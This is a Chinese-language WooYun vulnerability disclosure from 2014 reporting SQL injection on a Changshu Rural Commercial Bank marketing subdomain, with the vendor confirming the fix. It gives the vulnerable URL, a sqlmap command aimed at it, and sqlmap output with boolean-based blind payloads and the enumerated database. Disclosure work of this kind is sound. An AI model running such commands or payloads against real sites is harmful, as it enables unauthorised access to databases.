当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088646

漏洞标题:常熟农商银行某站点SQL注射

相关厂商:csrcbank.com

漏洞作者: 路人甲

提交时间:2014-12-25 19:25

修复时间:2014-12-26 14:49

公开时间:2014-12-26 14:49

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:4

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-25: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2014-12-26: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

常熟农商银行某站点SQL注射

详细说明:

链接:http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743
action字段和id字段均未过滤

sqlmap.py -u "http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743" --dbs


漏洞证明:

sqlmap identified the following injection points with a total of 597 HTTP(s) requests:
---
Parameter: action (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=ertonghuihua' AND 5154=5154 AND 'LTPr'='LTPr&type=pc&do=show&id=9743
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=ertonghuihua&type=pc&do=show&id=9743' AND 6165=6165 AND 'QwXw'='QwXw
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
available databases [1]:
[*] bank


修复方案:

你们在行

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-12-26 08:39

厂商回复:

感谢发现该漏洞,已经安排处理中

最新状态:

2014-12-26:该平台为营销公司(外包)的营销平台,不属于我行业务系统,目前该站点已删除。


漏洞评价:

评论

  1. 2014-12-26 20:32 | 纽伊斯特 ( 路人 | Rank:4 漏洞数:2 | 有的人活着,他已经死了。)

    银行速度就是快啊

  2. 2015-01-15 18:40 | 李宇航的小柠檬 ( 路人 | Rank:5 漏洞数:1 | 小柠檬甜不甜)

    什么,这站点,竟然被挖洞了,删删删。